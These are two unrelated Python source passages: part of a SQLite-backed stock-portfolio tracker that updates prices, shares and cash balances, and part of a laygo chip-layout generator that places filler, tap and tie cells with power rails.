    # the next statements raise NameError — confirm CreateFolder can't fail.
    json_data = Company(symbol, verbose)
    json_string = json.dumps(json_data)
    c = conn.cursor()
    c.execute("UPDATE folder SET json_string = (?) WHERE symbol = (?)", (json_string, symbol,))
    dt = datetime.datetime.now()
    c.execute("UPDATE folder SET update_time = (?) WHERE symbol = (?)", (dt.strftime("%m/%d/%y %H:%M"), symbol,))
    conn.commit()
    conn.close()
    # Fetch an initial quote; on success store price/quote and a 0 share count.
    quote = QuoteTradier(symbol, verbose)
    errors = []
    if ("Error Message" in quote[0]):
        errors.append([symbol, quote[0]['url'], quote[0]["Error Message"]])
    else:
        Price(symbol, quote[0], verbose)
        Shares(symbol, None, verbose)
    if (verbose):
        if (errors):
            pprint.pprint(errors)
        print ("***\n")
    return True
def Remove(symbol, verbose):
    """Delete *symbol*'s row from the folder table.

    Returns True on success, or False when the database cannot be opened.
    """
    db_file = GetDB(verbose)
    if verbose:
        print ("***")
        print ("Remove(1) symbol: {0}".format(symbol))
        print ("Remove(2) dbase: {0}".format(db_file))
    try:
        connection = sqlite3.connect(db_file)
    except Error as exc:
        print("Remove(4) {0}".format(exc))
        return False
    if verbose:
        print("Remove(3) sqlite3: {0}".format(sqlite3.version))
    cursor = connection.cursor()
    cursor.execute("DELETE FROM folder WHERE symbol=(?)", (symbol,))
    connection.commit()
    connection.close()
    if verbose:
        print ("***\n")
    return True
def Price(symbol, quote, verbose):
    """Store the latest price/quote state for *symbol* in the folder table.

    quote is a dict with at least 'price' and 'quote' keys (see the call
    sites that pass QuoteTradier results).  Returns True on success,
    False if the database cannot be opened.
    """
    db_file = GetDB(verbose)
    if (verbose):
        print ("***")
        print ("Price(1) symbol: {0}".format(symbol))
        print ("Price(2) price: {0}".format(quote['price']))
        print ("Price(3) quote: {0}".format(quote['quote']))
        print ("Price(4) dbase: {0}".format(db_file))
    # Ensure the row (and the folder table itself) exists before updating it.
    result = CreateFolder(symbol, verbose)
    if (result):
        try:
            conn = sqlite3.connect(db_file)
            if (verbose):
                print("Price(5) sqlite3: {0}".format(sqlite3.version))
        except Error as e:
            print("Price(6) {0}".format(e))
            return False
    # NOTE(review): if CreateFolder returned False, 'conn' is unbound here —
    # confirm CreateFolder can't fail before relying on it.
    c = conn.cursor()
    dt = datetime.datetime.now()
    # One parameterized UPDATE instead of three separate statements on the
    # same row: identical final state, a single write.
    c.execute("UPDATE folder SET price = ?, quote = ?, update_time = ? WHERE symbol = (?)",
              (quote['price'], quote['quote'], dt.strftime("%m/%d/%y %H:%M"), symbol,))
    conn.commit()
    conn.close()
    if (verbose):
        print ("***\n")
    return True
def Cash(balance, verbose):
    """Set the cash balance, stored as pseudo-symbol '$' with price 1.00.

    balance may be a string; it is normalized by to_number().  Returns
    False only when the database cannot be opened; otherwise True.
    """
    balance = to_number(balance, verbose)
    db_file = GetDB(verbose)
    if (verbose):
        print ("***")
        print ("Cash(1) balance: {0}".format(balance))
        print ("Cash(2) dbase: {0}".format(db_file))
    # Ensure the '$' row (and the folder table itself) exists.
    result = CreateFolder("$", verbose)
    if (result):
        try:
            conn = sqlite3.connect(db_file)
            if (verbose):
                print("Cash(3) sqlite3: {0}".format(sqlite3.version))
        except Error as e:
            print("Cash(4) {0}".format(e))
            return False
    # NOTE(review): if CreateFolder returned False, 'conn' is unbound here —
    # confirm CreateFolder can't fail before relying on it.
    c = conn.cursor()
    # Cash keeps balance == shares (price fixed at 1.00); balance is rounded
    # to cents, shares to 4 places.
    c.execute("UPDATE folder SET balance = ? WHERE symbol = '$'", (round(float(balance), 2),))
    dict_string = {'companyName': 'CASH', 'description': 'Cash Account', 'symbol': '$'}
    json_string = json.dumps(dict_string)
    c.execute("UPDATE folder SET json_string = (?) WHERE symbol = '$'", (json_string,))
    c.execute("UPDATE folder SET shares = ? WHERE symbol = '$'", (round(float(balance), 4),))
    dt = datetime.datetime.now()
    c.execute("UPDATE folder SET update_time = (?) WHERE symbol = '$'", (dt.strftime("%m/%d/%y %H:%M"),))
    c.execute("UPDATE folder SET price = 1.00 WHERE symbol = '$'")
    conn.commit()
    conn.close()
    if (verbose):
        print ("***\n")
    return True
def GetFolderCount(verbose):
    """Return the number of rows in the folder table.

    Returns 0 when the defaults database name is unknown, the database
    file is missing, the connection fails, or the table does not exist.
    """
    db_file = GetDB(verbose)
    if (verbose):
        print ("***")
    if db_file == "":
        if (verbose):
            print ("GetFolderCount(1) could not get dbase name, make sure that the defaults dbase is set up")
        return 0
    if (verbose):
        print ("GetFolderCount(2) dbase: {0}".format(db_file))
    if (not os.path.exists(db_file)):
        if (verbose):
            print ("GetFolderCount(3) {0} file is missing, cannot return the row count".format(db_file))
            print ("***\n")
        return 0
    try:
        conn = sqlite3.connect(db_file)
        if (verbose):
            print("GetFolderCount(4) sqlite3: {0}".format(sqlite3.version))
    except Error as e:
        print("GetFolderCount(5) {0}".format(e))
        return 0
    if (checkTableExists(conn, "folder")):
        c = conn.cursor()
        # COUNT(*) lets SQLite do the counting instead of materializing
        # every row just to take len() of the result.
        c.execute("select count(*) from folder")
        count = c.fetchone()[0]
    else:
        count = 0
    conn.close()
    if (verbose):
        print ("***\n")
    return count
def CreateFolder(key, verbose):
    """Create the folder table if needed and insert a row for *key*.

    The insert is OR IGNORE, so calling this for an existing symbol is a
    no-op.  When the very first non-cash symbol is added, a '$' cash row
    is bootstrapped with a zero balance.  Returns False only when the
    database cannot be opened; otherwise True.
    """
    db_file = GetDB(verbose)
    # Make sure the per-user working directory exists.
    username = getpass.getuser()
    Path(username + "/").mkdir(parents=True, exist_ok=True)
    if (verbose):
        print ("***")
        print ("CreateFolder(1) dbase: {0}".format(db_file))
    try:
        conn = sqlite3.connect(db_file)
        if (verbose):
            print("CreateFolder(2) sqlite3: {0}".format(sqlite3.version))
    except Error as e:
        print("CreateFolder(3) {0}".format(e))
        return False
    c = conn.cursor()
    c.execute("CREATE TABLE if not exists 'folder' ( `symbol` TEXT NOT NULL UNIQUE, `balance` REAL, `shares` REAL, `price` NUMERIC, `quote` TEXT, `update_time` TEXT, `json_string` TEXT, PRIMARY KEY(`symbol`) )")
    c.execute( "INSERT OR IGNORE INTO folder(symbol) VALUES((?))", (key,))
    conn.commit()
    conn.close()
    # Bootstrap the cash row the first time a real symbol is added
    # (Cash() itself calls back into CreateFolder for the '$' key).
    count = GetFolderCount(verbose)
    if (count == 1 and key != "$"):
        Cash("0", verbose)
    if (verbose):
        print ("***\n")
    return True
def Shares(symbol, shares, verbose):
    """Set the share count for *symbol* and recompute its balance.

    shares may be a string or None (treated as "0").  For the cash
    pseudo-symbol "$" the amount is delegated to Cash().  Returns a dict
    with 'status' plus either 'balance' or (for "$") 'shares'; on failure
    'exception' carries the error.
    """
    result = {}
    if shares is None:
        shares = "0"
    if (symbol == "$"):
        # Cash is stored as a balance, not a share count.
        Cash(shares, verbose)
        result['status'] = True
        result['shares'] = shares
        return result
    shares = to_number(shares, verbose)
    db_file = GetDB(verbose)
    # Make sure the per-user working directory exists.
    username = getpass.getuser()
    Path(username + "/").mkdir(parents=True, exist_ok=True)
    if (verbose):
        print ("***")
        print ("Shares(1) symbol: {0}".format(symbol))
        print ("Shares(2) shares: {0}".format(shares))
        print ("Shares(3) dbase: {0}".format(db_file))
    if (symbol == ""):
        e = "Error: symbol cannot be blank"
        print (e)
        result['status'] = False
        result['balance'] = 0
        result['exception'] = e
        return result
    folder = GetFolder(verbose)
    price = GetFolderValue(symbol, "price", folder)
    if (price is None):
        # Bug fix: a symbol with no stored price made 'shares * price' below
        # raise TypeError; treat a missing price as 0, as Balance() does.
        price = 0
    try:
        conn = sqlite3.connect(db_file)
        if (verbose):
            print("Shares(4) sqlite3: {0}".format(sqlite3.version))
    except Error as e:
        print("Shares(5) {0}".format(e))
        result['status'] = False
        result['balance'] = 0
        result['exception'] = e
        return result
    c = conn.cursor()
    c.execute("UPDATE folder SET shares = ? WHERE symbol = (?)", (shares, symbol,))
    balance = shares * price
    c.execute("UPDATE folder SET balance = ? WHERE symbol = (?)", (balance, symbol,))
    conn.commit()
    conn.close()
    if (verbose):
        print ("***\n")
    result['status'] = True
    result['balance'] = balance
    return result
def Balance(symbol, balance, verbose):
    """Set the balance for *symbol* and recompute its share count.

    balance may be a string or None (treated as "0").  For the cash
    pseudo-symbol "$" the amount is delegated to Cash().  Returns a dict
    with 'status' and 'shares'; on failure 'exception' carries the error.
    """
    result = {}
    if (balance is None):
        balance = "0"
    if (symbol == "$"):
        # Cash is stored directly as a balance.
        Cash(balance, verbose)
        result['status'] = True
        result['shares'] = balance
        return result
    balance = to_number(balance, verbose)
    db_file = GetDB(verbose)
    # Make sure the per-user working directory exists.
    username = getpass.getuser()
    Path(username + "/").mkdir(parents=True, exist_ok=True)
    if (verbose):
        print ("***")
        print ("Balance(1) symbol: {0}".format(symbol))
        print ("Balance(2) balance: {0}".format(balance))
        print ("Balance(3) dbase: {0}".format(db_file))
    if (symbol == ""):
        e = "Error: symbol cannot be blank"
        print (e)
        result['status'] = False
        result['shares'] = 0
        result['exception'] = e
        return result
    folder = GetFolder(verbose)
    price = GetFolderValue(symbol, "price", folder)
    try:
        conn = sqlite3.connect(db_file)
        if (verbose):
            print("Balance(4) sqlite3: {0}".format(sqlite3.version))
    except Error as e:
        print("Balance(5) {0}".format(e))
        result['status'] = False
        result['shares'] = 0
        result['exception'] = e
        return result
    c = conn.cursor()
    # Derive shares from balance; a missing or zero price yields 0 shares
    # rather than dividing by zero.
    shares = 0
    if (price is None):
        price = 0
    if price > 0:
        shares = balance / price
    c.execute("UPDATE folder SET shares = ? WHERE symbol = (?)", (shares, symbol,))
    c.execute("UPDATE folder SET balance = ? WHERE symbol = (?)", (balance, symbol,))
    conn.commit()
    conn.close()
    if (verbose):
        print ("***\n")
    result['status'] = True
    result['shares'] = shares
    return result
def Update(verbose):
    """Refresh the stored price/quote and balance for every non-cash symbol.

    Fetches fresh quotes (one batched request) and rewrites each row via
    Price() and Shares().  Returns a (success, error) tuple: (True, "")
    on success, (False, e) when the database cannot be opened or queried.
    """
    db_file = GetDB(verbose)
    # Make sure the per-user working directory exists.
    username = getpass.getuser()
    Path(username + "/").mkdir(parents=True, exist_ok=True)
    if (verbose):
        print ("***")
        print ("Update(1) dbase: {0}".format(db_file))
    try:
        conn = sqlite3.connect(db_file)
        if (verbose):
            print("Update(2) sqlite3: {0}".format(sqlite3.version))
    except Error as e:
        print("Update(3) dbase: {0}, {1}".format(db_file, e))
        return False, e
    c = conn.cursor()
    try:
        c.execute("SELECT symbol, shares, balance FROM folder where symbol != '$' order by symbol")
    except Error as e:
        print("Update(4) dbase: {0}, {1}".format(db_file, e))
        return False, e
    rows = c.fetchall()
    conn.commit()
    conn.close()
    if not rows:
        # Bug fix: with an empty folder the original sent an empty symbol
        # list to the quote service and 'quotes[0]' below raised IndexError.
        if (verbose):
            print ("***\n")
        return True, ""
    # Build a comma-separated symbol list for a single batched quote request.
    quote_list = ""
    for row in rows:
        quote_list += row[0] + ","
    quote_list = quote_list[:-1]
    quotes = QuoteTradier(quote_list, verbose)
    errors = []
    if ("Error Message" in quotes[0]):
        errors.append(quotes)
    if errors == []:
        # Match each folder row with its quote and persist the new state.
        for row in rows:
            for quote in quotes:
                if row[0] == quote["symbol"]:
                    result = Price(row[0], quote, verbose)
                    result = Shares(row[0], str(row[1]), verbose)
                    if (result['status']):
                        if (verbose):
                            print ("symbol: {0}, current shares: {1}, previous balance: {2}, current balance: {3}".format(row[0], row[1], row[2], result['balance']))
    if (verbose):
        if (errors):
            pprint.pprint(errors)
        print ("***\n")
    return True, ""
def DayisOpen(verbose):
    """Return True on a weekday once the configured opening time has passed.

    The opening time comes from the defaults ('open' key), in either
    12-hour ('%I:%M%p') or 24-hour ('%H:%M') form.  With no configured
    opening time the current time is compared with itself, so the result
    is False.
    """
    defaults, _tables = GetDefaults(verbose)
    opening = defaults['open']
    now_time = datetime.datetime.now().time()
    open_time = now_time
    if opening is not None:
        time_format = '%I:%M%p' if ("AM" in opening or "PM" in opening) else '%H:%M'
        open_time = datetime.datetime.strptime(opening, time_format).time()
    is_weekday = datetime.datetime.today().weekday() < 5
    return is_weekday and now_time > open_time
def DayisClosed(verbose):
    """Return True when the market day is over AND every non-cash symbol's
    stored quote state is "close".

    The closing time comes from the defaults ('close' key), in either
    12-hour ('%I:%M%p') or 24-hour ('%H:%M') form.  Returns False when no
    'close' default exists, the folder is empty, or any symbol has not
    yet reported a closing quote.
    """
    answer = False
    d, t = GetDefaults(verbose)
    ct = datetime.datetime.now().time()
    if "close" in d:
        end = d['close']
        # Default the closing time to "now" so a missing value never passes
        # the ct > et test below.
        et = ct
        if (end is not None):
            if "AM" in end or "PM" in end:
                et = datetime.datetime.strptime(end, '%I:%M%p').time()
            else:
                et = datetime.datetime.strptime(end, '%H:%M').time()
        if ct > et:
            folder = GetFolder(verbose)
            if folder != []:
                # Closed only if every non-cash entry already shows a
                # closing quote.
                answer = True
                for item in folder:
                    if item['symbol'] != "$":
                        if (item['quote'] != "close"):
                            answer = False
                            break
    return answer
def GetFolderCash(verbose):
folder = GetFolder(verbose)
answer = 0
| |
<reponame>xyabc/laygo_obsolete
#!/usr/bin/python
########################################################################################################################
#
# Copyright (c) 2014, Regents of the University of California
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
########################################################################################################################
"""Logic layout
"""
import laygo
import numpy as np
import yaml
import os
#import logging;logging.basicConfig(level=logging.DEBUG)
def create_io_pin(laygen, layer, gridname, pinname_list, rect_list, offset_y=np.array([-1, 1])):
    """Create digital I/O pins over *rect_list*, vertically aligned.

    Every pin takes the y-span of the first rectangle (shifted by
    *offset_y*) so all I/O pins line up on the same rows.
    """
    coords = [laygen.get_rect_xy(name=rect.name, gridname=gridname, sort=True)
              for rect in rect_list]
    # Reference y-span comes from the first rect, nudged by offset_y.
    aligned_y = coords[0][:, 1] + offset_y.T
    for idx, xy in enumerate(coords):
        xy[:, 1] = aligned_y
        laygen.pin(name=pinname_list[idx], layer=layer, xy=xy, gridname=gridname)
def create_power_pin(laygen, layer, gridname, rect_vdd, rect_vss):
    """Create VDD/VSS power pins over the given rail rectangles."""
    vdd_xy = laygen.get_rect_xy(rect_vdd.name, gridname)
    vss_xy = laygen.get_rect_xy(rect_vss.name, gridname)
    laygen.pin(name='VDD', layer=layer, xy=vdd_xy, gridname=gridname)
    laygen.pin(name='VSS', layer=layer, xy=vss_xy, gridname=gridname)
def generate_space_1x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False):
    """Generate a 1x-wide filler (space) cell.

    Places an NMOS space device at *origin* with a mirrored PMOS space
    device on top, draws the metal2 VDD/VSS rails across the template
    width and, when *create_pin* is set, pins the rails out.

    :param laygen: laygo generator instance used for all place/route/pin calls
    :param objectname_pfix: prefix used to build unique instance/route names
    :param placement_grid: placement grid name
    :param routing_grid_m1m2: m1-m2 routing grid name
    :param origin: placement origin in grid coordinates
    :param create_pin: when True, create VDD/VSS pin shapes over the rails
    """
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    # placement: NMOS space at origin, PMOS space mirrored (MX) on top
    in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space', pg, xy=origin)
    ip0 = laygen.relplace("I"+objectname_pfix + 'P0', 'pmos4_fast_space', pg, in0.name, direction='top', transform='MX')
    # power and ground rail: metal2 lines spanning the template width
    xy = laygen.get_template_size(in0.cellname, rg_m1m2) * np.array([1, 0])
    laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
                 refinstname0=ip0.name, refinstname1=ip0.name)
    laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
                 refinstname0=in0.name, refinstname1=in0.name)
    # power pin (idiomatic truthiness test instead of '== True')
    if create_pin:
        rvdd_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VDD0", rg_m1m2)
        rvss_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VSS0", rg_m1m2)
        laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2)
        laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2)
def generate_space_2x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False):
    """Generate a 2x-wide filler (space) cell (nf=2 templates).

    Places an NMOS space device at *origin* with a mirrored PMOS space
    device on top, draws the metal2 VDD/VSS rails across the template
    width and, when *create_pin* is set, pins the rails out.

    :param laygen: laygo generator instance used for all place/route/pin calls
    :param objectname_pfix: prefix used to build unique instance/route names
    :param placement_grid: placement grid name
    :param routing_grid_m1m2: m1-m2 routing grid name
    :param origin: placement origin in grid coordinates
    :param create_pin: when True, create VDD/VSS pin shapes over the rails
    """
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    # placement: NMOS space at origin, PMOS space mirrored (MX) on top
    in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space_nf2', pg, xy=origin)
    ip0 = laygen.relplace("I"+objectname_pfix + 'P0', 'pmos4_fast_space_nf2', pg, in0.name, direction='top', transform='MX')
    # power and ground rail: metal2 lines spanning the template width
    xy = laygen.get_template_size(in0.cellname, rg_m1m2) * np.array([1, 0])
    laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
                 refinstname0=ip0.name, refinstname1=ip0.name)
    laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
                 refinstname0=in0.name, refinstname1=in0.name)
    # power pin (idiomatic truthiness test instead of '== True')
    if create_pin:
        rvdd_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VDD0", rg_m1m2)
        rvss_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VSS0", rg_m1m2)
        laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2)
        laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2)
def generate_space_4x(laygen, objectname_pfix, placement_grid, routing_grid_m1m2, origin=np.array([0, 0]), create_pin=False):
    """Generate a 4x-wide filler (space) cell (nf=4 templates).

    Places an NMOS space device at *origin* with a mirrored PMOS space
    device on top, draws the metal2 VDD/VSS rails across the template
    width and, when *create_pin* is set, pins the rails out.

    :param laygen: laygo generator instance used for all place/route/pin calls
    :param objectname_pfix: prefix used to build unique instance/route names
    :param placement_grid: placement grid name
    :param routing_grid_m1m2: m1-m2 routing grid name
    :param origin: placement origin in grid coordinates
    :param create_pin: when True, create VDD/VSS pin shapes over the rails
    """
    pg = placement_grid
    rg_m1m2 = routing_grid_m1m2
    # placement: NMOS space at origin, PMOS space mirrored (MX) on top
    in0 = laygen.place("I"+objectname_pfix + 'N0', 'nmos4_fast_space_nf4', pg, xy=origin)
    ip0 = laygen.relplace("I"+objectname_pfix + 'P0', 'pmos4_fast_space_nf4', pg, in0.name, direction='top', transform='MX')
    # power and ground rail: metal2 lines spanning the template width
    xy = laygen.get_template_size(in0.cellname, rg_m1m2) * np.array([1, 0])
    laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
                 refinstname0=ip0.name, refinstname1=ip0.name)
    laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
                 refinstname0=in0.name, refinstname1=in0.name)
    # power pin (idiomatic truthiness test instead of '== True')
    if create_pin:
        rvdd_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VDD0", rg_m1m2)
        rvss_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VSS0", rg_m1m2)
        laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2)
        laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2)
def generate_tap(laygen, objectname_pfix, placement_grid, routing_grid_m1m2,
                 devname_nmos_tap, devname_pmos_tap, origin=np.array([0, 0]), create_pin=False):
    """Generate a well/substrate tap cell.

    Places an NMOS tap at *origin* with a mirrored PMOS tap on top, straps
    the tap contacts down to the rail row on metal1, draws the metal2
    VDD/VSS rails across the template width and optionally pins them out.

    :param laygen: laygo generator instance used for all place/route/pin calls
    :param objectname_pfix: prefix used to build unique instance/route names
    :param placement_grid: placement grid name
    :param routing_grid_m1m2: m1-m2 routing grid name
    :param devname_nmos_tap: NMOS tap template cell name
    :param devname_pmos_tap: PMOS tap template cell name
    :param origin: placement origin in grid coordinates
    :param create_pin: when True, create VDD/VSS pin shapes over the rails
    """
    pg = placement_grid
    rg_m1m2=routing_grid_m1m2
    # placement: NMOS tap at origin, PMOS tap directly above, mirrored (MX)
    in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin)
    ip0 = laygen.relplace("I"+objectname_pfix + 'P0', devname_pmos_tap, pg, in0.name, direction='top', transform='MX')
    # tap route: metal1 strap from each TAP0 pin down to the rail row
    # (y forced to 0 by the [1, 0] mask), with a via at the rail row
    xy_tap0 = laygen.get_template_pin_coord(in0.cellname, 'TAP0', rg_m1m2)[0, :]
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2,
                 refinstname0=in0.name, refinstname1=in0.name)
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2,
                 refinstname0=ip0.name, refinstname1=ip0.name)
    laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2)
    laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2)
    # NOTE(review): xy_tap1 re-reads pin 'TAP0', so the routes/vias below
    # duplicate the ones above exactly -- looks like a copy/paste slip;
    # confirm whether pin 'TAP1' was intended here
    xy_tap1 = laygen.get_template_pin_coord(in0.cellname, 'TAP0', rg_m1m2)[0, :]
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2,
                 refinstname0=in0.name, refinstname1=in0.name)
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2,
                 refinstname0=ip0.name, refinstname1=ip0.name)
    laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2)
    laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2)
    # power and ground rail: metal2 lines spanning the template width
    xy = laygen.get_template_size(in0.cellname, rg_m1m2) * np.array([1, 0])
    laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
                 refinstname0=ip0.name, refinstname1=ip0.name)
    laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
                 refinstname0=in0.name, refinstname1=in0.name)
    # power pin (optional)
    if create_pin==True:
        rvdd_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VDD0", rg_m1m2)
        rvss_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VSS0", rg_m1m2)
        laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2)
        laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2)
def generate_plugged_tap(laygen, objectname_pfix, placement_grid, routing_grid_m1m2,
                         devname_nmos_tap, devname_pmos_tap, devname_plug, origin=np.array([0, 0]), create_pin=False):
    """Generate a tap cell with an additional plug template at the origin.

    Same structure as generate_tap, plus a *devname_plug* instance placed at
    the same origin as the NMOS tap.

    :param laygen: laygo generator instance used for all place/route/pin calls
    :param objectname_pfix: prefix used to build unique instance/route names
    :param placement_grid: placement grid name
    :param routing_grid_m1m2: m1-m2 routing grid name
    :param devname_nmos_tap: NMOS tap template cell name
    :param devname_pmos_tap: PMOS tap template cell name
    :param devname_plug: plug template cell name, overlaid at the tap origin
    :param origin: placement origin in grid coordinates
    :param create_pin: when True, create VDD/VSS pin shapes over the rails
    """
    pg = placement_grid
    rg_m1m2=routing_grid_m1m2
    # placement: NMOS tap and plug share the same origin (the plug instance
    # is not referenced again -- presumably it only contributes geometry from
    # its template; TODO confirm), PMOS tap mirrored (MX) on top
    in0 = laygen.place("I"+objectname_pfix + 'N0', devname_nmos_tap, pg, xy=origin)
    iplug0 = laygen.place("I"+objectname_pfix + 'PLUG0', devname_plug, pg, xy=origin)
    ip0 = laygen.relplace("I"+objectname_pfix + 'P0', devname_pmos_tap, pg, in0.name, direction='top', transform='MX')
    # tap route: metal1 strap from each TAP0 pin down to the rail row
    # (y forced to 0 by the [1, 0] mask), with a via at the rail row
    xy_tap0 = laygen.get_template_pin_coord(in0.cellname, 'TAP0', rg_m1m2)[0, :]
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2,
                 refinstname0=in0.name, refinstname1=in0.name)
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap0 * np.array([1, 0]), xy1=xy_tap0, gridname0=rg_m1m2,
                 refinstname0=ip0.name, refinstname1=ip0.name)
    laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2)
    laygen.via(None, xy_tap0 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2)
    # NOTE(review): xy_tap1 re-reads pin 'TAP0', so the routes/vias below
    # duplicate the ones above exactly -- looks like a copy/paste slip;
    # confirm whether pin 'TAP1' was intended here
    xy_tap1 = laygen.get_template_pin_coord(in0.cellname, 'TAP0', rg_m1m2)[0, :]
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2,
                 refinstname0=in0.name, refinstname1=in0.name)
    laygen.route(None, laygen.layers['metal'][1], xy0=xy_tap1 * np.array([1, 0]), xy1=xy_tap1, gridname0=rg_m1m2,
                 refinstname0=ip0.name, refinstname1=ip0.name)
    laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=in0.name, gridname=rg_m1m2)
    laygen.via(None, xy_tap1 * np.array([1, 0]), refinstname=ip0.name, gridname=rg_m1m2)
    # power and ground rail: metal2 lines spanning the template width
    xy = laygen.get_template_size(in0.cellname, rg_m1m2) * np.array([1, 0])
    laygen.route("R"+objectname_pfix+"VDD0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
                 refinstname0=ip0.name, refinstname1=ip0.name)
    laygen.route("R"+objectname_pfix+"VSS0", laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=xy, gridname0=rg_m1m2,
                 refinstname0=in0.name, refinstname1=in0.name)
    # power pin (optional)
    if create_pin==True:
        rvdd_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VDD0", rg_m1m2)
        rvss_pin_xy = laygen.get_rect_xy("R"+objectname_pfix+"VSS0", rg_m1m2)
        laygen.pin(name='VDD', layer=laygen.layers['pin'][2], xy=rvdd_pin_xy, gridname=rg_m1m2)
        laygen.pin(name='VSS', layer=laygen.layers['pin'][2], xy=rvss_pin_xy, gridname=rg_m1m2)
def generate_tie(laygen, objectname_pfix,
placement_grid, routing_grid_m1m2, routing_grid_m2m3, routing_grid_m1m2_pin, routing_grid_m2m3_pin,
devname_nmos_boundary, devname_nmos_body, devname_pmos_boundary, devname_pmos_body,
m=1, origin=np.array([0,0]), create_pin=False):
pg = placement_grid
rg_m1m2 = routing_grid_m1m2
rg_m2m3 = routing_grid_m2m3
rg_m1m2_pin = routing_grid_m1m2_pin
rg_m2m3_pin = routing_grid_m2m3_pin
m=max(1, int(m/2)) #using nf=2 devices
# placement
